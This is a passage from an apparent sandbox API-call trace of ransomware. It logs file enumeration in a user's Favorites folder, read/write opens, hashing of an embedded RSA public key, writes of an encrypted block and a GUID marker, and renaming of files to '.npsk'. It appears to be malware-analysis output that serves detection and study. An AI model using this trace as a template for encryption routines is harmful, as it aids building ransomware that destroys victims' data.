nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0216.556] CloseHandle (hObject=0x61c) returned 1 [0216.559] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn.url.npsk")) returned 1 [0216.560] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSNBC News.url", cAlternateFileName="MSNBCN~1.URL")) returned 1 [0216.560] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url") returned=".url" [0216.560] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msnbc news.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0216.586] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=133) returned 1 [0216.586] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0216.588] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.588] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0216.589] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x85, lpOverlapped=0x0) returned 1 [0216.589] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.589] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.589] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.589] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1ce8) returned 1 [0216.590] CryptCreateHash (in: hProv=0x7b1ce8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0216.590] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0216.590] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0216.590] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0216.590] GetLastError () returned 0x0 [0216.590] CryptDestroyHash (hHash=0x3277d68) returned 1 [0216.590] CryptReleaseContext (hProv=0x7b1ce8, dwFlags=0x0) returned 1 [0216.590] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0216.590] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0216.590] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0216.590] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8b1c8 [0216.591] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.591] WriteFile (in: hFile=0x61c, lpBuffer=0x3227170*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3227170*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0216.591] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0216.591] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0216.591] CloseHandle (hObject=0x61c) returned 1 [0216.593] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msnbc news.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msnbc news.url.npsk")) returned 1 [0216.594] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSNBC News.url", cAlternateFileName="MSNBCN~1.URL")) returned 0 [0216.594] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0216.594] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0216.594] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0216.595] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\") returned="Windows Live\\" [0216.595] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="Favorites\\" [0216.595] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0216.595] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0216.595] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0216.595] PathFindFileNameW (pszPath="") returned="" [0216.595] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0216.596] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0216.596] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Get Windows Live.url", cAlternateFileName="GETWIN~1.URL")) returned 1 [0216.596] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url") returned=".url" [0216.596] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\get windows live.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0216.598] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=133) returned 1 [0216.598] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0216.599] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.599] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0216.600] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x85, lpOverlapped=0x0) returned 1 [0216.600] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.600] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.600] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.600] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1ce8) returned 1 [0216.601] CryptCreateHash (in: hProv=0x7b1ce8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0216.601] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0216.601] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0216.601] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0216.601] GetLastError () returned 0x0 [0216.601] CryptDestroyHash (hHash=0x3277d68) returned 1 [0216.601] CryptReleaseContext (hProv=0x7b1ce8, dwFlags=0x0) returned 1 [0216.601] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0216.601] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0216.601] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0216.601] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8b1c8 [0216.602] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.602] WriteFile (in: hFile=0x61c, lpBuffer=0x3227170*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3227170*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0216.602] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0216.602] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0216.602] CloseHandle (hObject=0x61c) returned 1 [0216.603] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\get windows live.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\get windows live.url.npsk")) returned 1 [0216.604] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live Gallery.url", cAlternateFileName="WINDOW~2.URL")) returned 1 [0216.604] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url") returned=".url" [0216.604] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live gallery.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0216.606] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=133) returned 1 [0216.606] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0216.607] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.607] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0216.608] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x85, lpOverlapped=0x0) returned 1 [0216.608] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.608] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.608] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.608] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1ce8) returned 1 [0216.609] CryptCreateHash (in: hProv=0x7b1ce8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0216.609] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0216.609] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0216.610] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0216.610] GetLastError () returned 0x0 [0216.610] CryptDestroyHash (hHash=0x3277d68) returned 1 [0216.610] CryptReleaseContext (hProv=0x7b1ce8, dwFlags=0x0) returned 1 [0216.610] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0216.610] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0216.610] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0216.610] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8b1c8 [0216.610] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.610] WriteFile (in: hFile=0x61c, lpBuffer=0x3227170*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3227170*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0216.611] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0216.611] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0216.611] CloseHandle (hObject=0x61c) returned 1 [0216.612] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live gallery.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live gallery.url.npsk")) returned 1 [0216.613] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live Mail.url", cAlternateFileName="WINDOW~1.URL")) returned 1 [0216.613] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url") returned=".url" [0216.613] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live mail.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0216.613] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=133) returned 1 [0216.613] VirtualAlloc 